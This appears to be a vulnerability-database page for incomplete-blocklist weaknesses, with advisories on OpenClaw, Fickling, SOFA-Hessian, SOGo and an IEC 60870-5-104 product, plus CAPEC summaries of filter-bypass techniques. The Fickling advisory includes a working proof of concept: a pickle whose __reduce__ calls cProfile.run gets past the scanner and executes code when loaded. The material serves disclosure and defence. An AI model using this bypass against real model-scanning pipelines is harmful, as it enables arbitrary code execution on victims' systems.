On systems where a trusted-prefix directory is writable (for example common Homebrew layouts under /opt/homebrew/bin) and runtime $SHELL can be influenced, this enabled attacker-controlled binary execution in OpenClaw process context.
The fix removes the trusted-prefix executable fallback and now trusts only shells explicitly registered in /etc/shells; otherwise it falls back to /bin/sh.
Affected Packages / Versions
- Package:
openclaw(npm) - Affected versions:
>= 2026.2.22, <= 2026.2.22-2 - Latest published vulnerable version:
2026.2.22-2 - Patched versions (released):
>= 2026.2.23
Fix Commit(s)
ff10fe8b91670044a6bb0cd85deb736a0ec8fb55
Release Process Note
This advisory sets patched_versions to the released version (2026.2.23).
This advisory now reflects released fix version 2026.2.23.
OpenClaw thanks @tdjackey for reporting.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "openclaw"
},
"ranges": [
{
"events": [
{
"introduced": "2026.2.22"
},
{
"fixed": "2026.2.23"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-22217"
],
"database_specific": {
"cwe_ids": [
"CWE-184",
"CWE-829"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-03T21:36:16Z",
"nvd_published_at": "2026-03-18T02:16:23Z",
"severity": "MODERATE"
},
"details": "### Summary\n`shell-env` fallback trusted prefix-based executable paths for `$SHELL`, allowing execution of attacker-controlled binaries in local/runtime-env influence scenarios.\n\n### Details\nIn affected versions, shell selection accepted either:\n1. a shell listed in `/etc/shells`, or\n2. any executable under hardcoded trusted prefixes (`/bin`, `/usr/bin`, `/usr/local/bin`, `/opt/homebrew/bin`, `/run/current-system/sw/bin`).\n\nThe selected shell was then executed as a login shell (`-l -c \u0027env -0\u0027`) for PATH/environment probing.\n\nOn systems where a trusted-prefix directory is writable (for example common Homebrew layouts under `/opt/homebrew/bin`) and runtime `$SHELL` can be influenced, this enabled attacker-controlled binary execution in OpenClaw process context.\n\nThe fix removes the trusted-prefix executable fallback and now trusts only shells explicitly registered in `/etc/shells`; otherwise it falls back to `/bin/sh`.\n\n### Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected versions: `\u003e= 2026.2.22, \u003c= 2026.2.22-2`\n- Latest published vulnerable version: `2026.2.22-2`\n- Patched versions (released): `\u003e= 2026.2.23`\n\n### Fix Commit(s)\n- `ff10fe8b91670044a6bb0cd85deb736a0ec8fb55`\n\n### Release Process Note\nThis advisory sets `patched_versions` to the released version (`2026.2.23`).\nThis advisory now reflects released fix version `2026.2.23`.\n\nOpenClaw thanks @tdjackey for reporting.",
"id": "GHSA-p4wh-cr8m-gm6c",
"modified": "2026-06-08T23:24:01Z",
"published": "2026-03-03T21:36:16Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-p4wh-cr8m-gm6c"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22217"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/commit/ff10fe8b91670044a6bb0cd85deb736a0ec8fb55"
},
{
"type": "PACKAGE",
"url": "https://github.com/openclaw/openclaw"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-binary-execution-via-shell-environment-variable-trusted-prefix-fallback"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "OpenClaw: shell-env trusted-prefix fallback allowed attacker-controlled binary execution via $SHELL"
}
GHSA-P523-JQ9W-64X9
Vulnerability from github – Published: 2026-01-09 21:04 – Updated: 2026-01-11 14:54Fickling's assessment
cProfile was added to the list of unsafe imports (https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43).
Original report
Description
Summary
Fickling versions up to and including 0.1.6 do not treat Python's cProfile module as unsafe. Because of this, a malicious pickle that uses cProfile.run() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS.
If a user relies on Fickling's output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system.
This affects any workflow or product that uses Fickling as a security gate for pickle deserialization.
Details
The cProfile module is missing from fickling's block list of unsafe module imports in fickling/analysis.py. This is the same root cause as CVE-2025-67748 (pty) and CVE-2025-67747 (marshal/types).
Incriminated source code:
- File:
fickling/analysis.py - Class:
UnsafeImports - Issue: The blocklist does not include
cProfile,cProfile.run, orcProfile.runctx
Reference to similar fix:
- PR #187 added
ptyto the blocklist to fix CVE-2025-67748 - PR #108 documented the blocklist approach
- The same fix pattern should be applied for
cProfile
How the bypass works:
- Attacker creates a pickle using
cProfile.run()in__reduce__ cProfile.run()accepts a Python code string and executes it directly (C-accelerated version of profile.run)- Fickling's
UnsafeImportsanalysis does not flagcProfileas dangerous - Only the
UnusedVariablesheuristic triggers, resulting in SUSPICIOUS severity - The pickle should be rated OVERTLY_MALICIOUS like
os.system,eval, andexec
Tested behavior (fickling 0.1.6):
| Function | Fickling Severity | RCE Capable |
|---|---|---|
| os.system | LIKELY_OVERTLY_MALICIOUS | Yes |
| eval | OVERTLY_MALICIOUS | Yes |
| exec | OVERTLY_MALICIOUS | Yes |
| cProfile.run | SUSPICIOUS | Yes ← BYPASS |
| cProfile.runctx | SUSPICIOUS | Yes ← BYPASS |
Suggested fix:
Add to the unsafe imports blocklist in fickling/analysis.py:
- cProfile
- cProfile.run
- cProfile.runctx
- _lsprof (underlying C module)
PoC
Complete instructions, including specific configuration details, to reproduce the vulnerability.
Environment: - Python 3.13.2 - fickling 0.1.6 (latest version, installed via pip)
Step 1: Create malicious pickle
import pickle
import cProfile
class MaliciousPayload:
def __reduce__(self):
return (cProfile.run, ("print('CPROFILE_RCE_CONFIRMED')",))
with open("malicious.pkl", "wb") as f:
pickle.dump(MaliciousPayload(), f)
Step 2: Analyze with fickling
from fickling.fickle import Pickled
from fickling.analysis import check_safety
with open('malicious.pkl', 'rb') as f:
data = f.read()
pickled = Pickled.load(data)
result = check_safety(pickled)
print(f"Severity: {result.severity}")
print(f"Analysis: {result}")
Expected output (if properly detected):
Severity: Severity.OVERTLY_MALICIOUS
Actual output (bypass confirmed):
Severity: Severity.SUSPICIOUS
Analysis: Variable `_var0` is assigned value `run(...)` but unused afterward; this is suspicious and indicative of a malicious pickle file
Step 3: Prove RCE by loading the pickle
python -c "import pickle; pickle.load(open('malicious.pkl', 'rb'))"
Output
CPROFILE_RCE_CONFIRMED
4 function calls in 0.000 seconds
Ordered by: standard name
ncalls tottime percall cumtime percall filename:lineno(function)
1 0.000 0.000 0.000 0.000 <string>:1(<module>)
1 0.000 0.000 0.000 0.000 {built-in method builtins.exec}
1 0.000 0.000 0.000 0.000 {built-in method builtins.print}
1 0.000 0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects}
Check: The code executes, proving RCE.
Pickle disassembly (evidence):
0: \x80 PROTO 5
2: \x95 FRAME 58
11: \x8c SHORT_BINUNICODE 'cProfile'
21: \x94 MEMOIZE (as 0)
22: \x8c SHORT_BINUNICODE 'run'
27: \x94 MEMOIZE (as 1)
28: \x93 STACK_GLOBAL
29: \x94 MEMOIZE (as 2)
30: \x8c SHORT_BINUNICODE "print('CPROFILE_RCE_CONFIRMED')"
63: \x94 MEMOIZE (as 3)
64: \x85 TUPLE1
65: \x94 MEMOIZE (as 4)
66: R REDUCE
67: \x94 MEMOIZE (as 5)
68: . STOP
highest protocol among opcodes = 4
Impact
Vulnerability Type:
Incomplete blocklist leading to safety check bypass (CWE-184) and arbitrary code execution via insecure deserialization (CWE-502).
Who is impacted:
Any user or system that relies on fickling to vet pickle files for security issues before loading them. This includes: - ML model validation pipelines - Model hosting platforms (Hugging Face, MLflow, etc.) - Security scanning tools that use fickling - CI/CD pipelines that validate pickle artifacts
Attack scenario:
An attacker uploads a malicious ML model or pickle file to a model repository. The victim's pipeline uses fickling to scan uploads. Fickling rates the file as "SUSPICIOUS" (not "OVERTLY_MALICIOUS"), so the file is not rejected. When the victim loads the model, arbitrary code executes on their system.
Why cProfile.run() is dangerous:
Unlike runpy.run_path() which requires a file on disk, cProfile.run() takes a code string directly. This means the entire attack is self-contained in the pickle - no external files needed. Python docs explicitly state that cProfile.run() takes "a single argument that can be passed to the exec() function".
cProfile is the C-accelerated version and is more commonly available than profile. It's also the recommended profiler per Python docs ("cProfile is recommended for most users"), so it's present in virtually all Python installations.
Severity: HIGH
- The attacker achieves arbitrary code execution
- The security control (fickling) is specifically designed to prevent this
- The bypass requires no special conditions beyond crafting the pickle with cProfile
- Attack is fully self-contained (no external files needed)
- cProfile is more commonly used than profile, increasing attack surface
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.1.6"
},
"package": {
"ecosystem": "PyPI",
"name": "fickling"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.1.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-22607"
],
"database_specific": {
"cwe_ids": [
"CWE-184",
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-09T21:04:22Z",
"nvd_published_at": "2026-01-10T02:15:49Z",
"severity": "HIGH"
},
"details": "# Fickling\u0027s assessment\n\n`cProfile` was added to the list of unsafe imports (https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43).\n\n# Original report\n\n## Description\n\n### Summary\n\nFickling versions up to and including 0.1.6 do not treat Python\u0027s `cProfile` module as unsafe. Because of this, a malicious pickle that uses `cProfile.run()` is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS.\n\nIf a user relies on Fickling\u0027s output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system.\n\nThis affects any workflow or product that uses Fickling as a security gate for pickle deserialization.\n\n### Details\n\nThe `cProfile` module is missing from fickling\u0027s block list of unsafe module imports in `fickling/analysis.py`. This is the same root cause as CVE-2025-67748 (pty) and CVE-2025-67747 (marshal/types).\n\nIncriminated source code:\n\n- File: `fickling/analysis.py`\n- Class: `UnsafeImports`\n- Issue: The blocklist does not include `cProfile`, `cProfile.run`, or `cProfile.runctx`\n\nReference to similar fix:\n\n- PR #187 added `pty` to the blocklist to fix CVE-2025-67748\n- PR #108 documented the blocklist approach\n- The same fix pattern should be applied for `cProfile`\n\nHow the bypass works:\n\n1. Attacker creates a pickle using `cProfile.run()` in `__reduce__`\n2. `cProfile.run()` accepts a Python code string and executes it directly (C-accelerated version of profile.run)\n3. Fickling\u0027s `UnsafeImports` analysis does not flag `cProfile` as dangerous\n4. Only the `UnusedVariables` heuristic triggers, resulting in SUSPICIOUS severity\n5. The pickle should be rated OVERTLY_MALICIOUS like `os.system`, `eval`, and `exec`\n\nTested behavior (fickling 0.1.6):\n\n| Function | Fickling Severity | RCE Capable |\n|----------|-------------------|-------------|\n| os.system | LIKELY_OVERTLY_MALICIOUS | Yes |\n| eval | OVERTLY_MALICIOUS | Yes |\n| exec | OVERTLY_MALICIOUS | Yes |\n| cProfile.run | SUSPICIOUS | Yes \u2190 BYPASS |\n| cProfile.runctx | SUSPICIOUS | Yes \u2190 BYPASS |\n\nSuggested fix:\n\nAdd to the unsafe imports blocklist in `fickling/analysis.py`:\n- `cProfile`\n- `cProfile.run`\n- `cProfile.runctx`\n- `_lsprof` (underlying C module)\n\n## PoC\n\nComplete instructions, including specific configuration details, to reproduce the vulnerability.\n\nEnvironment:\n- Python 3.13.2\n- fickling 0.1.6 (latest version, installed via pip)\n\n### Step 1: Create malicious pickle\n\n```python\nimport pickle\nimport cProfile\n\nclass MaliciousPayload:\n def __reduce__(self):\n return (cProfile.run, (\"print(\u0027CPROFILE_RCE_CONFIRMED\u0027)\",))\n\nwith open(\"malicious.pkl\", \"wb\") as f:\n pickle.dump(MaliciousPayload(), f)\n```\n\n### Step 2: Analyze with fickling\n\n```python\nfrom fickling.fickle import Pickled\nfrom fickling.analysis import check_safety\n\nwith open(\u0027malicious.pkl\u0027, \u0027rb\u0027) as f:\n data = f.read()\n\npickled = Pickled.load(data)\nresult = check_safety(pickled)\nprint(f\"Severity: {result.severity}\")\nprint(f\"Analysis: {result}\")\n```\n\nExpected output (if properly detected):\n```\nSeverity: Severity.OVERTLY_MALICIOUS\n```\n\nActual output (bypass confirmed):\n```\nSeverity: Severity.SUSPICIOUS\nAnalysis: Variable `_var0` is assigned value `run(...)` but unused afterward; this is suspicious and indicative of a malicious pickle file\n```\n\n### Step 3: Prove RCE by loading the pickle\n\n```bash\npython -c \"import pickle; pickle.load(open(\u0027malicious.pkl\u0027, \u0027rb\u0027))\"\n```\n\nOutput\n```\nCPROFILE_RCE_CONFIRMED\n 4 function calls in 0.000 seconds\n\n Ordered by: standard name\n\n ncalls tottime percall cumtime percall filename:lineno(function)\n 1 0.000 0.000 0.000 0.000 \u003cstring\u003e:1(\u003cmodule\u003e)\n 1 0.000 0.000 0.000 0.000 {built-in method builtins.exec}\n 1 0.000 0.000 0.000 0.000 {built-in method builtins.print}\n 1 0.000 0.000 0.000 0.000 {method \u0027disable\u0027 of \u0027_lsprof.Profiler\u0027 objects}\n```\n\nCheck: The code executes, proving RCE.\n\n### Pickle disassembly (evidence):\n\n```\n 0: \\x80 PROTO 5\n 2: \\x95 FRAME 58\n 11: \\x8c SHORT_BINUNICODE \u0027cProfile\u0027\n 21: \\x94 MEMOIZE (as 0)\n 22: \\x8c SHORT_BINUNICODE \u0027run\u0027\n 27: \\x94 MEMOIZE (as 1)\n 28: \\x93 STACK_GLOBAL\n 29: \\x94 MEMOIZE (as 2)\n 30: \\x8c SHORT_BINUNICODE \"print(\u0027CPROFILE_RCE_CONFIRMED\u0027)\"\n 63: \\x94 MEMOIZE (as 3)\n 64: \\x85 TUPLE1\n 65: \\x94 MEMOIZE (as 4)\n 66: R REDUCE\n 67: \\x94 MEMOIZE (as 5)\n 68: . STOP\nhighest protocol among opcodes = 4\n```\n\n## Impact\n\nVulnerability Type:\n\nIncomplete blocklist leading to safety check bypass (CWE-184) and arbitrary code execution via insecure deserialization (CWE-502).\n\nWho is impacted:\n\nAny user or system that relies on fickling to vet pickle files for security issues before loading them. This includes:\n- ML model validation pipelines\n- Model hosting platforms (Hugging Face, MLflow, etc.)\n- Security scanning tools that use fickling\n- CI/CD pipelines that validate pickle artifacts\n\nAttack scenario:\n\nAn attacker uploads a malicious ML model or pickle file to a model repository. The victim\u0027s pipeline uses fickling to scan uploads. Fickling rates the file as \"SUSPICIOUS\" (not \"OVERTLY_MALICIOUS\"), so the file is not rejected. When the victim loads the model, arbitrary code executes on their system.\n\nWhy cProfile.run() is dangerous:\n\nUnlike `runpy.run_path()` which requires a file on disk, `cProfile.run()` takes a code string directly. This means the entire attack is self-contained in the pickle - no external files needed. Python docs explicitly state that `cProfile.run()` takes \"a single argument that can be passed to the exec() function\".\n\n`cProfile` is the C-accelerated version and is more commonly available than `profile`. It\u0027s also the recommended profiler per Python docs (\"cProfile is recommended for most users\"), so it\u0027s present in virtually all Python installations.\n\nSeverity: HIGH\n\n- The attacker achieves arbitrary code execution\n- The security control (fickling) is specifically designed to prevent this\n- The bypass requires no special conditions beyond crafting the pickle with cProfile\n- Attack is fully self-contained (no external files needed)\n- cProfile is more commonly used than profile, increasing attack surface",
"id": "GHSA-p523-jq9w-64x9",
"modified": "2026-01-11T14:54:55Z",
"published": "2026-01-09T21:04:22Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-565g-hwwr-4pp3"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-p523-jq9w-64x9"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-r7v6-mfhq-g3m2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22607"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/pull/108"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/pull/187"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/pull/195"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43"
},
{
"type": "PACKAGE",
"url": "https://github.com/trailofbits/fickling"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/blob/977b0769c13537cd96549c12bb537f05464cf09c/test/test_bypasses.py#L116"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/releases/tag/v0.1.7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Fickling Blocklist Bypass: cProfile.run()"
}
GHSA-PFWP-8PQ4-G7PV
Vulnerability from github – Published: 2019-03-06 17:36 – Updated: 2024-03-21 16:02SOFA-Hessian through 4.0.2 allows remote attackers to execute arbitrary commands via a crafted serialized Hessian object because blacklisting of com.caucho.naming.QName and com.sun.org.apache.xpath.internal.objects.XString is mishandled, related to Resin Gadget.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "com.alipay.sofa:hessian"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.0.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "com.alipay.sofa:hessian"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.3.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-9212"
],
"database_specific": {
"cwe_ids": [
"CWE-184",
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T21:49:03Z",
"nvd_published_at": "2019-02-27T17:29:00Z",
"severity": "CRITICAL"
},
"details": "SOFA-Hessian through 4.0.2 allows remote attackers to execute arbitrary commands via a crafted serialized Hessian object because blacklisting of com.caucho.naming.QName and com.sun.org.apache.xpath.internal.objects.XString is mishandled, related to Resin Gadget.",
"id": "GHSA-pfwp-8pq4-g7pv",
"modified": "2024-03-21T16:02:59Z",
"published": "2019-03-06T17:36:08Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-9212"
},
{
"type": "WEB",
"url": "https://github.com/alipay/sofa-hessian/issues/34"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-pfwp-8pq4-g7pv"
},
{
"type": "PACKAGE",
"url": "https://github.com/alipay/sofa-hessian"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Incomplete List of Disallowed Inputs in SOFA-Hessian"
}
GHSA-PX99-X547-MJJW
Vulnerability from github – Published: 2022-05-13 01:30 – Updated: 2022-05-13 01:30Incomplete blacklist in SOGo before 2.3.12 and 3.x before 3.1.1 allows remote authenticated users to obtain sensitive information by reading the fields in the (1) ics or (2) XML calendar feeds.
{
"affected": [],
"aliases": [
"CVE-2016-6189"
],
"database_specific": {
"cwe_ids": [
"CWE-184"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-02-17T17:59:00Z",
"severity": "MODERATE"
},
"details": "Incomplete blacklist in SOGo before 2.3.12 and 3.x before 3.1.1 allows remote authenticated users to obtain sensitive information by reading the fields in the (1) ics or (2) XML calendar feeds.",
"id": "GHSA-px99-x547-mjjw",
"modified": "2022-05-13T01:30:39Z",
"published": "2022-05-13T01:30:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6189"
},
{
"type": "WEB",
"url": "https://github.com/inverse-inc/sogo/commit/717f45f640a2866b76a8984139391fae64339225"
},
{
"type": "WEB",
"url": "https://github.com/inverse-inc/sogo/commit/875a4aca3218340fd4d3141950c82c2ff45b343d"
},
{
"type": "WEB",
"url": "https://sogo.nu/bugs/view.php?id=3695"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2016/07/09/3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-Q2VG-XGJR-32V3
Vulnerability from github – Published: 2026-02-24 15:30 – Updated: 2026-05-26 18:31IEC 60870-5-104: Potential Denial of Service impact on reception of invalid U-format frame. Product is only affected if IEC 60870-5-104 bi-directional functionality is configured. Enabling secure communication following IEC 62351-3 does not remediate the vulnerability but mitigates the risk of exploitation.
{
"affected": [],
"aliases": [
"CVE-2026-1773"
],
"database_specific": {
"cwe_ids": [
"CWE-184"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-24T14:16:22Z",
"severity": "HIGH"
},
"details": "IEC 60870-5-104: Potential Denial of Service impact on reception of invalid U-format frame.\u00a0Product is only affected if IEC 60870-5-104 bi-directional functionality is configured. Enabling secure communication following IEC 62351-3 does not remediate the vulnerability but mitigates the risk of exploitation.",
"id": "GHSA-q2vg-xgjr-32v3",
"modified": "2026-05-26T18:31:36Z",
"published": "2026-02-24T15:30:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1773"
},
{
"type": "WEB",
"url": "https://publisher.hitachienergy.com/preview?DocumentID=8DBD000237\u0026LanguageCode=en\u0026DocumentPartId=\u0026Action=Launch"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
Mitigation
Strategy: Input Validation
Do not rely exclusively on detecting disallowed inputs. There are too many variants to encode a character, especially when different environments are used, so there is a high likelihood of missing some variants. Only use detection of disallowed inputs as a mechanism for detecting suspicious activity. Ensure that you are using other protection mechanisms that only identify "good" input - such as lists of allowed inputs - and ensure that you are properly encoding your outputs.
CAPEC-120: Double Encoding
The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) by interpreters on the target.
CAPEC-15: Command Delimiters
An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.
CAPEC-182: Flash Injection
An attacker tricks a victim to execute malicious flash content that executes commands or makes flash calls specified by the attacker. One example of this attack is cross-site flashing, an attacker controlled parameter to a reference call loads from content specified by the attacker.
CAPEC-3: Using Leading 'Ghost' Character Sequences to Bypass Input Filters
Some APIs will strip certain leading characters from a string of parameters. An adversary can intentionally introduce leading "ghost" characters (extra characters that don't affect the validity of the request at the API layer) that enable the input to pass the filters and therefore process the adversary's input. This occurs when the targeted API will accept input data in several syntactic forms and interpret it in the equivalent semantic way, while the filter does not take into account the full spectrum of the syntactic forms acceptable to the targeted API.
CAPEC-43: Exploiting Multiple Input Interpretation Layers
An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: <parser1> --> <input validator> --> <parser2>. In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.
CAPEC-6: Argument Injection
An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.
CAPEC-71: Using Unicode Encoding to Bypass Validation Logic
An attacker may provide a Unicode string to a system component that is not Unicode aware and use that to circumvent the filter or cause the classifying mechanism to fail to properly understanding the request. That may allow the attacker to slip malicious data past the content filter and/or possibly cause the application to route the request incorrectly.
CAPEC-73: User-Controlled Filename
An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.
CAPEC-85: AJAX Footprinting
This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.